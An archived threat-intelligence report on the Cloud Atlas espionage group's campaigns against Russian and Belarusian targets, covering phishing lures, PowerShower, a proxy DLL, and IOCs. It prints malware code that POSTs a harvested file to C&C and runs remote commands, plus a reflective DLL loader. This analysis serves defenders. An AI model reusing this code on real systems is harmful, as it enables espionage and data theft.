{ "id": "c63b35cf-fcfd-43c9-8217-6417bb7cf405", "created_at": "2026-04-09T02:22:48.015354Z", "updated_at": "2026-04-10T03:36:27.508668Z", "deleted_at": null, "sha1_hash": "efb50f457d596c98bb5a19e6429e5ba1714b9310", "title": "Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 153488, "plain_text": "Cloud Atlas targets entities in Russia and Belarus amid the\r\nongoing war in Ukraine\r\nBy etal\r\nPublished: 2022-12-09 · Archived: 2026-04-09 02:15:53 UTC\r\nIntroduction\r\nCloud Atlas (or Inception) is a cyber-espionage group. Since its discovery in 2014, they have launched multiple,\r\nhighly targeted attacks on critical infrastructure across geographical zones and political conflicts. The group’s\r\ntactics, techniques and procedures (TTPs) have remained relatively static over the years. However, since the rapid\r\nescalation of the conflict between Russia and Ukraine in 2021 and especially after the outbreak of war in February\r\n2022, the scope of the group’s activities has narrowed significantly, with a clear focus on Russia, Belarus and\r\nconflicted areas in Ukraine and Moldova. Some evidence discovered while monitoring the group’s latest activities\r\nindicates that the group carried out a few successful intrusions and managed to gain full access to some of the\r\ntargeted environments.\r\nIn this publication, we discuss the tools, TTPs and victimology of Cloud Atlas in the last year. Interestingly, in\r\naddition to the usual malware used by Cloud Atlas, we discovered a new, previously never discussed tool: the\r\ngroup installs not only their signature modular espionage framework on the infected systems, but also uses the\r\nDLL to proxy connections through the victims’ machines.\r\nWhile we finalized this blogpost, another technical analysis of Cloud Atlas activity was published. While it\r\noverlaps with our findings to some extent, we believe that this report provides the additional information, insights\r\nand clarifications regarding the actors’ operations.\r\nVictimology\r\nThe group’s victims shift with the escalation of the political situation around Ukraine. In 2020-2021 the targets we\r\nobserved included a wide range of ministries, diplomatic entities and industrial targets across the globe, including\r\nWestern and Southeast Asia and Europe (especially, but not only Eastern Europe).  However, toward the end of\r\n2021, amid the rising tensions between Russia and Ukraine, the focus of the group shifted to the Crimean\r\nPeninsula and breakaway regions of Ukraine, Luhansk and Donetsk, as well as government, diplomatic, research\r\nand industry entities of Russia and Belarus.\r\nIn March-April 2022, Cloud Atlas was observed targeting entities in the pro-Russian Transnistria breakaway\r\nregion of Moldova, officially known as the Transnistrian Moldavian Republic, where tensions were escalating\r\namid fears that Russia would try to extend its sovereignty to Transnistria or use the republic’s territories for an\r\noffensive against Ukraine. Since June 2022, we have seen multiple persistent campaigns focused on very specific\r\ntargets in Belarus, mainly in its transportation and military radio-electronics sectors, and in Russia, including the\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 1 of 12\n\ngovernment sector, energy and metal industries. The actors are also maintaining their focus on the Russian-annexed Crimean Peninsula, Lugansk and Donetsk regions.\r\nInitial infection\r\nCloud Atlas has used spear-phishing emails containing malicious attachments as their initial attack vector for\r\nmany years. They mostly use public email services like Yandex, Mail.ru and Outlook.com, but in some cases also\r\nattempted to spoof the existing domains of other entities that are likely to be trusted by the target.\r\nFigure 1 – Example of spear-phishing email (subject: “The Diplomatic Academy of the Ministry of Foreign\r\nAffairs, Diplomatic Service and Practice Journal”) sent by Cloud Atlas to one of the Russian ministries.\r\nThe email attachment is usually a Microsoft Office document which retrieves a malicious remote template from\r\nthe attackers’ servers. The lures of these documents are carefully tailored to the target. We observed a variety of\r\nweaponized documents ranging from governmental documents to publicly available reports and articles, including\r\nbusiness proposals and advertisements.\r\nFigure 2 – Examples of lure documents targeting Belarussian entities: A description of the “Comprehensive\r\nanalysis of the economic and financial activities of a commercial organization” course from Belarusian State\r\nEconomic University (left) and the advertisement of the company specialized in office equipment (right).\r\nFigure 3 – Examples of lure documents used by CloudAtlas against government and energy sectors.\r\n(Resolution of the government of the Russian Federation on the application of legislation in the field of atomic\r\nenergy in the Zaporozhye region, on the right.)\r\nThe remote templates are RTF documents that exploit 5-year-old vulnerabilities in Microsoft Equation Editor,\r\nsuch as CVE-2017-11882 and CVE-2018-0802. For both external templates and the later stages of the campaign,\r\nthe attackers closely control who can access them by whitelisting the targets. This is a known technique used by\r\nCloud Atlas to collect the IP information of the victims by first sending them reconnaissance documents, which do\r\nnot contain any malicious functionality aside from fingerprinting the victim. Whitelisting can be easily performed\r\nin those cases where the targeted entities are large enough to have their own ASN. The use of whitelisting\r\nsignificantly decreases the chances of the malicious components executing in sandboxes or research environments.\r\nPowerShower backdoor\r\nThe next stage of a Cloud Atlas attack is usually a PowerShell-based backdoor called PowerShower.\r\n PowerShower is stored on the disk with simple obfuscation of Base64-encoding and string concatenation:\r\nFigure 4 – Example of PowerShower backdoor obfuscation.\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 2 of 12\n\nThe PowerShower versions that we observed during our research included a thinner functionality compared to\r\nolder versions, but the backdoor remained essentially unchanged, including function names, such as\r\nHttpRequestG , HttpRequestP , and dec64 that can be tracked through the different versions.\r\nOnce PowerShower is up and running, it mainly waits for further instructions from the Command and Control\r\n(C\u0026C) server. It may save a zip file sent from the server to %TEMP%\\PG.zip or execute PowerShell commands\r\nthat are sent embedded in an XML file in a Base64-encoded format:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$xmlfile = (gi $env:temp).fullname + \"\\\\temp.xml\";\r\n[io.file]::WriteAllBytes($xmlfile, $result);\r\n$content = Get-Content $xmlfile;\r\n[xml]$doc = $content;\r\n$command = dec64($doc.model.ps);\r\nInvoke-Expression $command;\r\nRemove-Item $xmlfile -force;\r\n$xmlfile = (gi $env:temp).fullname + \"\\\\temp.xml\"; [io.file]::WriteAllBytes($xmlfile, $result); $content = Get-Content $xmlfile; [xml]$doc = $content; $command = dec64($doc.model.ps); Invoke-Expression $command;\r\nRemove-Item $xmlfile -force;\r\n$xmlfile = (gi $env:temp).fullname + \"\\\\temp.xml\";\r\n[io.file]::WriteAllBytes($xmlfile, $result);\r\n$content = Get-Content $xmlfile;\r\n[xml]$doc = $content;\r\n$command = dec64($doc.model.ps);\r\nInvoke-Expression $command;\r\nRemove-Item $xmlfile -force;\r\nFigure 5 – PowerShower piece of code that handles parsing XML and PowerShell command execution.\r\nOne of the recent changes introduced in PowerShower is proxy awareness: if a proxy is enabled on the infected\r\nmachine, the malware uses it when issuing the requests to the C\u0026C server. In addition, the script now sends some\r\nbasic data about the victim’s machine (OS major and minor versions and PowerShell version) in the User-Agent\r\nheader of the POST request:\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 3 of 12\n\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nFunction HttpRequestP($url)\r\n{\r\n$all=\"\";\r\n$p_t = (gi $env:temp).fullname + \"\\pass.txt\";\r\n$content = [io.file]::ReadAllText($p_t);\r\nRemove-Item $p_t -force -recurse;\r\n$all=$content;\r\n$http_request = New-Object -ComObject Msxml2.ServerXMLHTTP.6.0;\r\n$http_request.open(\"POST\", $url, $false);\r\n$http_request.setOption(2,$http_request.getOption(2));\r\n$pr = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\";\r\nif ( $pr.ProxyEnable -eq \"1\")\r\n{\r\n$http_request.setProxy(2, $pr.ProxyServer);\r\n}\r\n$psv = $PSVersionTable.PSVersion.Major;\r\n$wvmajor = [Environment]::OSVersion.Version.Major;\r\n$wvminor = [Environment]::OSVersion.Version.Minor;\r\n$http_request.SetRequestHeader(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT \" + $wvmajor\r\n+ \".\" + $wvminor + \"; PS \" + $psv + \".00)\");\r\n$http_request.send(\"$all\");\r\nreturn $http_request.status;\r\n}\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 4 of 12\n\nFunction HttpRequestP($url) { $all=\"\"; $p_t = (gi $env:temp).fullname + \"\\pass.txt\"; $content =\r\n[io.file]::ReadAllText($p_t); Remove-Item $p_t -force -recurse; $all=$content; $http_request = New-Object -\r\nComObject Msxml2.ServerXMLHTTP.6.0; $http_request.open(\"POST\", $url, $false);\r\n$http_request.setOption(2,$http_request.getOption(2)); $pr = Get-ItemProperty -Path\r\n\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\"; if ( $pr.ProxyEnable -eq \"1\") {\r\n$http_request.setProxy(2, $pr.ProxyServer); } $psv = $PSVersionTable.PSVersion.Major; $wvmajor =\r\n[Environment]::OSVersion.Version.Major; $wvminor = [Environment]::OSVersion.Version.Minor;\r\n$http_request.SetRequestHeader(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT \" + $wvmajor\r\n+ \".\" + $wvminor + \"; PS \" + $psv + \".00)\"); $http_request.send(\"$all\"); return $http_request.status; }\r\nFunction HttpRequestP($url)\r\n{\r\n $all=\"\";\r\n $p_t = (gi $env:temp).fullname + \"\\pass.txt\";\r\n $content = [io.file]::ReadAllText($p_t);\r\n Remove-Item $p_t -force -recurse;\r\n $all=$content;\r\n $http_request = New-Object -ComObject Msxml2.ServerXMLHTTP.6.0;\r\n $http_request.open(\"POST\", $url, $false);\r\n $http_request.setOption(2,$http_request.getOption(2));\r\n $pr = Get-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\r\n if ( $pr.ProxyEnable -eq \"1\")\r\n {\r\n $http_request.setProxy(2, $pr.ProxyServer);\r\n }\r\n $psv = $PSVersionTable.PSVersion.Major;\r\n $wvmajor = [Environment]::OSVersion.Version.Major;\r\n $wvminor = [Environment]::OSVersion.Version.Minor;\r\n $http_request.SetRequestHeader(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT \" + $\r\n $http_request.send(\"$all\");\r\n return $http_request.status;\r\n}\r\nFigure 6 – PowerShower proxy handling and User-Agent string concatenation.\r\nRtcpProxy Tool\r\nOne of the interesting payloads received by PowerShower is a script called office.ps1 . This script reflectively\r\nloads in memory and runs the StartMainXor function from the .NET DLL stored in the script compressed and\r\nBase64-encoded.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 5 of 12\n\nEnlighterJS 3 Syntax Highlighter\r\n$dll_compressed_base64=\"H4sIAAAAAAA\u003ctruncated\u003e\"\r\n$dll_compressed=[System.Convert]::FromBase64String($dll_compressed_base64)\r\n$ms=New-ObjectSystem.IO.MemoryStream(,$dll_compressed)\r\n$cs=New-ObjectSystem.IO.Compression.GzipStream($ms,[IO.Compression.CompressionMode]::Decompress)\r\n$br=New-ObjectSystem.IO.BinaryReader($cs)\r\n$dll_content=$br.ReadBytes(10485760)\r\n$br.Close()\r\n$cs.Close()\r\n$ms.Close()\r\n[System.Reflection.Assembly]::Load($dll_content)\r\n#$content_bytes=[tcp_ssl_simple.NetTcpSsl]::StartHello()\r\n#[abcd.Service]::StartHello()\r\n// Prototype:\r\n// StartMainXor(string host, string port, int number, int reconnect_sleep, int time_stop_delay_seconds, string\r\nhexkey)\r\n$content_bytes=[abcd.Service]::StartMainXor(\"\u003cserver_address\u003e\", \"11171\", 10, 7000, 15 * 60,\r\n\"010203BADC0DEF\")\r\nwrite-host\"DoneTest\"\r\n$dll_compressed_base64=\"H4sIAAAAAAA\u003ctruncated\u003e\" $dll_compressed=\r\n[System.Convert]::FromBase64String($dll_compressed_base64) $ms=New-ObjectSystem.IO.MemoryStream(,$dll_compressed) $cs=New-ObjectSystem.IO.Compression.GzipStream($ms,\r\n[IO.Compression.CompressionMode]::Decompress) $br=New-ObjectSystem.IO.BinaryReader($cs)\r\n$dll_content=$br.ReadBytes(10485760) $br.Close() $cs.Close() $ms.Close()\r\n[System.Reflection.Assembly]::Load($dll_content) #$content_bytes=[tcp_ssl_simple.NetTcpSsl]::StartHello() #\r\n[abcd.Service]::StartHello() // Prototype: // StartMainXor(string host, string port, int number, int reconnect_sleep,\r\nint time_stop_delay_seconds, string hexkey) $content_bytes=[abcd.Service]::StartMainXor(\"\u003cserver_address\u003e\",\r\n\"11171\", 10, 7000, 15 * 60, \"010203BADC0DEF\") write-host\"DoneTest\"\r\n$dll_compressed_base64=\"H4sIAAAAAAA\u003ctruncated\u003e\"\r\n$dll_compressed=[System.Convert]::FromBase64String($dll_compressed_base64)\r\n$ms=New-ObjectSystem.IO.MemoryStream(,$dll_compressed)\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 6 of 12\n\n$cs=New-ObjectSystem.IO.Compression.GzipStream($ms,[IO.Compression.CompressionMode]::Decompress)\r\n$br=New-ObjectSystem.IO.BinaryReader($cs)\r\n$dll_content=$br.ReadBytes(10485760)\r\n$br.Close()\r\n$cs.Close()\r\n$ms.Close()\r\n[System.Reflection.Assembly]::Load($dll_content)\r\n#$content_bytes=[tcp_ssl_simple.NetTcpSsl]::StartHello()\r\n#[abcd.Service]::StartHello()\r\n// Prototype:\r\n// StartMainXor(string host, string port, int number, int reconnect_sleep, int time_stop_delay_second\r\n$content_bytes=[abcd.Service]::StartMainXor(\"\u003cserver_address\u003e\", \"11171\", 10, 7000, 15 * 60, \"010203BA\r\nwrite-host\"DoneTest\"\r\nThis DLL is internally called rtcpsvc.dll and is responsible for relaying commands between two different\r\nservers. This DLL is likely a part of a sequence of proxies used by the attackers. There were multiple past reports\r\nthat the actors heavily relied on a world-wide proxy network, however, it was never mentioned that they achieved\r\nthis with DLLs on Windows. Setting proxies within compromised environments might also in some cases allow\r\nthe actors to penetrate high profile targets while reducing the risk of their network activity being discovered or\r\nblocked, as the network activity is associated with trusted sources inside the country or industry.\r\nThe communication between the DLL and the hosts can be XOR-encrypted, depending on if the DLL was\r\nexecuted with a key parameter or without.  In all the cases we analyzed, the same key “ 010203BADC0DEF ” was\r\nused for the XOR-encryption. Other parameters that are provided to launch the DLL include the host and port of\r\nthe remote peer, the number of connections, and the amount of time to sleep before reconnecting.\r\nFigure 7 – Overview of the Communication class responsible for communication between two peers.\r\nThe DLL reaches out to the specified remote host ( Left ) and receives 4 bytes in response. These bytes specify\r\nthe length of the next message (command) to be received. It then connects again to the host and expects an XML\r\nresponse with the connect command. This XML response should contain the host and port of another\r\n( Right ) peer. The DLL connects to the second host as well, notifies the first host of success, and starts to relay\r\nmessages between them.\r\nFigure 8 – Function responsible for sending the connect result in XML format to the “Left” peer.\r\nSimilar to the command execution status sent to the peers, the relayed messages themselves are also in XML\r\nformat, as well as the commands received by the PowerShower backdoor.\r\nModular espionage framework\r\nInterestingly, the actors made no significant changes in the core of their modular backdoor in the seven years after\r\nits discovery in 2014 by Kaspersky and Symantec. As described in the aforementioned reports, we observed\r\nmultiple samples of Cloud Atlas’ modular backdoor. Each is an obfuscated DLL accompanied by an encrypted\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 7 of 12\n\nfile, with both DLL and data files named using random words. For example, a DLL named beachmaster.dll was\r\naccompanied by an encrypted file named examinere . Each DLL has multiple randomly-named export functions,\r\nonly one of which is relevant. When the relevant export function is called, the DLL begins to decrypt and load an\r\nembedded PE file. The loaded PE file then XOR-decrypts a hardcoded struct that instructs it how to decrypt the\r\ncompanion file. For example, the hardcoded struct in the PE inside beachmaster.dll will look like this:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n0000h: C6 8E CA BF E5 DE 8E 74 1E 08 E3 FB 6D C1 79 3F ÆŽÊ¿åÞŽt..ãûmÁy?\r\n0010h: E5 19 69 0C 55 74 54 F7 CF 15 9D AF 00 02 D9 55 å.i.UtT÷Ï.�¯..ÙU\r\n0020h: 47 00 6C 00 6F 00 62 00 61 00 6C 00 5C 00 49 00 G.l.o.b.a.l.\\.I.\r\n0030h: 54 00 4F 00 4A 00 75 00 43 00 65 00 69 00 00 00 T.O.J.u.C.e.i...\r\n0040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n[…truncated…]\r\n0090h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n00A0h: 65 00 78 00 61 00 6D 00 69 00 6E 00 65 00 72 00 e.x.a.m.i.n.e.r.\r\n00B0h: 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e...............\r\n00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n[…truncated…]\r\n0110h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\r\n0120h: 7D CB BE 31 61 A3 10 54 8F D7 31 71 5E E7 21 86 }˾1a£.T�×1q^ç!†\r\n0130h: 13 E1 CF 96 .áÏ–\r\n....\r\n0000h: C6 8E CA BF E5 DE 8E 74 1E 08 E3 FB 6D C1 79 3F ÆŽÊ¿åÞŽt..ãûmÁy? 0010h: E5 19 69 0C 55 74 54\r\nF7 CF 15 9D AF 00 02 D9 55 å.i.UtT÷Ï.�¯..ÙU 0020h: 47 00 6C 00 6F 00 62 00 61 00 6C 00 5C 00 49 00\r\nG.l.o.b.a.l.\\.I. 0030h: 54 00 4F 00 4A 00 75 00 43 00 65 00 69 00 00 00 T.O.J.u.C.e.i... 0040h: 00 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 ................ […truncated…] 0090h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n00 ................ 00A0h: 65 00 78 00 61 00 6D 00 69 00 6E 00 65 00 72 00 e.x.a.m.i.n.e.r. 00B0h: 65 00 00 00 00 00\r\n00 00 00 00 00 00 00 00 00 00 e............... 00C0h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ […\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 8 of 12\n\ntruncated…] 0110h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0120h: 7D CB BE 31 61 A3 10\r\n54 8F D7 31 71 5E E7 21 86 }˾1a£.T�×1q^ç!† 0130h: 13 E1 CF 96 .áÏ– ....\r\n0000h:C68ECABFE5DE8E741E08E3FB6DC1793FÆŽÊ¿åÞŽt..ãûmÁy?\r\n0010h:E519690C557454F7CF159DAF0002D955å.i.UtT÷Ï.�¯..ÙU\r\n0020h:47006C006F00620061006C005C004900G.l.o.b.a.l.\\.I.\r\n0030h:54004F004A0075004300650069000000T.O.J.u.C.e.i...\r\n0040h:00000000000000000000000000000000................\r\n[…truncated…]\r\n0090h:00000000000000000000000000000000................\r\n00A0h:6500780061006D0069006E0065007200e.x.a.m.i.n.e.r.\r\n00B0h:65000000000000000000000000000000e...............\r\n00C0h:00000000000000000000000000000000................\r\n[…truncated…]\r\n0110h:00000000000000000000000000000000................\r\n0120h:7DCBBE3161A310548FD731715EE72186}˾1a£.T�×1q^ç!†\r\n0130h:13E1CF96.áÏ–\r\n....\r\nThe structure is built from an AES256 key which is used to decrypt the companion file, an event name which\r\nprevents running multiple instances of malware, a file name of the encrypted companion file, and a SHA1 hash.\r\nThe SHA1 at the end of the structure is used for a hash check: it matches the calculated SHA1 hash of the first\r\n0x120 bytes of the configuration.\r\nThe payload then decrypts the companion file. It uses the AES256 key from the config, and the last 16 bytes from\r\nthe companion file as an IV. It then uses LZNT1 to decompress the results and reveal another PE file. The newly\r\nrevealed DLL also has an encrypted configuration hardcoded inside. Its decryption process is similar to those seen\r\nin previous stages and this config provides information that instructs the malware how to communicate with its\r\nC\u0026C server.\r\nThe malware still lives up to its “cloud name” origins and uses cloud storage providers to communicate via\r\nWebDAV protocol. In the samples we observed, Cloud Atlas used OpenDrive as its service of choice. The\r\ncredentials for OpenDrive are hardcoded in the encrypted configuration, along with two URIs (one for uploading\r\nfiles from the victim, one for downloading files from the server) and the pattern and extensions to generate the\r\nnames of the uploaded files. The data sent to the service, such as information about the environment of the victim,\r\nis saved as files under the URI specified in the configuration. Additionally, the payload connects to another URI to\r\nreceive the next payload, and when it downloads the next payload, it issues a request to the server to remove the\r\ndownloaded file. The first module which is sent automatically is the stealer module, which is responsible for\r\ncollecting the login and cookie data from multiple browsers on the victim’s machine.\r\nIncident response report\r\nWhile investigating CloudAtlas activity, we stumbled upon some type of incident response report written in\r\nRussian that was uploaded to VirusTotal from an IP address located in Donetsk. This report (no TLP label\r\nspecified) provides an analysis of a few successful intrusions that occurred in June. These intrusions were\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 9 of 12\n\ndiscovered only in the later stages when the attackers already had full access to the entire network including the\r\ndomain controller. Although not all the information in the report is precise and well-detailed, we can cautiously\r\nextract some of the group’s additional TTPs during the later stages of the attack:\r\nAfter gaining access to the domain controller, the actors extract the snapshot of its database using the\r\nntdsutil utility and copy it to their server for offline analysis and extraction of password hashes.\r\nTo connect to the machines inside the victim organization’s network, the attackers use the infected\r\ncomputers of ordinary users, from which they then connect via RDP to the domain controller. The attackers\r\nuse existing domain accounts after changing their permissions or create accounts with similar names by\r\nchanging one or two letters. The actors conduct their primary activities (using RDP or ssh to other servers,\r\nendpoints or network equipment) from the domain controller, impersonating regular sysadmin operations.\r\nAdditional tools used by the attackers include Advanced Port Scanner (version 2.5.3869, with Russian\r\ninterface), file manager Far, Chocolatey, AnyDesk, and Putty (copied to the servers and deleted after\r\ncompleting the task). The actors also use Python 3 scripts on multiple servers to perform a variety of\r\noperations such as: searching and deleting all information about connections to webdav.opendrive.com\r\nfrom the logs of the Squid proxy server; copying correspondence from Telegram clients, saved passwords\r\nand browser history; and brute force of Microtik routers.\r\nIt is not clear from the report which organizations or entities were the victims of these attacks.\r\nConclusion\r\nCloud Atlas continuously and persistently targets entities of interest. With the escalation of the conflict between\r\nRussia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic,\r\ngovernment, energy and technology sectors, and on the annexed regions of Ukraine.\r\nCloud Atlas continues to use the simple but effective method of social engineering, using spear-phishing emails to\r\ncompromise their targets. In the first stage of the attack, the actors use Word documents with remote templates,\r\nusually whitelisted for a particular target, which makes the phishing documents almost undetectable. Judging by\r\nthe fact that the group continues to be very active despite only minor changes in TTPs, their methods seem to be\r\nsuccessful. Not only do they manage to penetrate their targets and expand their initial access to the entire domain,\r\nbut they can also use them as proxies for other operations.\r\nHarmony Email \u0026 Office deploys between the inbox and its native security. The solution secures inbound,\r\noutbound, and internal email from phishing attacks that evade platform-provided solutions and email gateways. It\r\nworks with these other solutions and doesn’t require any MX record changes that broadcast security protocols to\r\nhackers.\r\nCheck Point’s Threat Emulation protects networks against unknown threats in web downloads and e-mail\r\nattachments. The Threat Emulation engine picks up malware at the initial phase, before it enters the network. The\r\nengine quickly quarantines and runs the files in a virtual sandbox environment, which imitates a standard\r\noperating system, to discover malicious behavior at the exploit phase.\r\nIOCs\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 10 of 12\n\nDocuments, scripts and payloads\r\na34d585f66fc4582ed709298d00339a9\r\nb1aad1ed2925c47f848f9c86a4f35256\r\nf58ad9ee5d052cb9532830f59ecb5b84\r\n57c44757d7a43d3bc9e64ec5c5e5515d\r\n41d2627522794e9ec227d72f842edaf7\r\nf95ceca752d219dbc251cca4cd723eae\r\n044e167af277ca0d809ce4289121a7b5\r\n1139c39dda645f4c7b06b662083a0b9d\r\n3399deafaa6b91e8c19d767935ae0908\r\nbd9907dd708608bd82bf445f8c9c06ab\r\nedc96c980bbc85d83dcd4dca49ca613f\r\nee671a205b0204fa1a6b4e31c9539771\r\n5488781d71b447431a025bd21b098c2c\r\n16fbbafa294d1f4c6c043d89138d1b60\r\n5bbc3730c943b89673453176979d6811\r\nb684f3ee5a316e7fbcfa95ebcf86dedc\r\nae74f2bfd671e11828a1ae040fe6d48c\r\n2a21265df0bdd70a96551d9d6104b352\r\na8a93fa8ef221de5ee3d110cfc85243d\r\neb527d1682bfbed5d9346e721c38c6f5\r\nae828e3c03cc1aaedc43bb391e8b47ed\r\nc7a1dd829b03b47c6038afa870b2f965\r\nc2064c7f4826c46bc609c472597366fd\r\n89d40dd2db9c2cfd6a03b20b307dcdec\r\nd236d8fda2b7d6fd49b728d57c92a0a9\r\n9b05080490d51a7d2806a0d55d75c7ff\r\nd5a40e2986efd4a182bf564084533763\r\n077b71298ce31832ae43e834b7e6c080\r\nf68e64dacd046289d4222098ee421478\r\nd236d8fda2b7d6fd49b728d57c92a0a9\r\n81932933422d4bc4ece37472f9eb3ddc\r\nd0d728856a91710df364576e05f2113e\r\n94283807d0c97b3adb8f4ab45fffb5bc\r\n0e9147b824bc1d2507984ccd2a36d507\r\ndc3faa6840d1b5fd296d71ee8877254e\r\naa04bfcc675c73be1238fa953e19c4cf\r\n789afbe3a173d13d0b3700da6a629e15\r\nacbbc6fea0dbbe7cba511b450cc2b758\r\ne79833c9f758775ba0d82b8f4c8d2981\r\n3609ca3013d29fb824805b9a996eff70\r\n956f2241e81345d6507d0cd43499dba1\r\na3ba37cde2644ed6345d2c74ce25bfd8\r\na7a004e7118c986f1e07c87ce52a60e5\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 11 of 12\n\nb7b71b35fbfd119319015b04de817b3c\r\nf29cbc7639b53003fb33d8b20b9c0b59\r\nDomains\r\ndesktoppreview[.]com\r\ngettemplate[.]org\r\ndriversolution[.]net\r\ntranslate-news[.]net\r\ntechnology-requests[.]net\r\nprotocol-list[.]com\r\ncomparelicense[.]com\r\nsupport-app[.]net\r\nremote-convert[.]com\r\nIPs\r\n146.70.88.123\r\n185.227.82.21\r\nSource: https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nhttps://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://research.checkpoint.com/2022/cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine/" ], "report_names": [ "cloud-atlas-targets-entities-in-russia-and-belarus-amid-the-ongoing-war-in-ukraine" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "77b28afd-8187-4917-a453-1d5a279cb5e4", "created_at": "2022-10-25T15:50:23.768278Z", "updated_at": "2026-04-10T02:00:05.266635Z", "deleted_at": null, "main_name": "Inception", "aliases": [ "Inception Framework", "Cloud Atlas" ], "source_name": "MITRE:Inception", "tools": [ "PowerShower", "VBShower", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "04a7ebaa-ebb1-4971-b513-a0c86886d932", "created_at": "2023-01-06T13:46:38.784965Z", "updated_at": "2026-04-10T02:00:03.099088Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "Clean Ursa", "Cloud Atlas", "G0100", "ATK116", "Blue Odin" ], "source_name": "MISPGALAXY:Inception Framework", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "02c9f3f6-5d10-456b-9e63-750286048149", "created_at": "2022-10-25T16:07:23.722884Z", "updated_at": "2026-04-10T02:00:04.72726Z", "deleted_at": null, "main_name": "Inception Framework", "aliases": [ "ATK 116", "Blue Odin", "Clean Ursa", "Cloud Atlas", "G0100", "Inception Framework", "Operation Cloud Atlas", "Operation RedOctober", "The Rocra" ], "source_name": "ETDA:Inception Framework", "tools": [ "Lastacloud", "PowerShower", "VBShower" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775701368, "ts_updated_at": 1775792187, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.pdf", "text": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.txt", "img": "https://archive.orkl.eu/efb50f457d596c98bb5a19e6429e5ba1714b9310.jpg" } }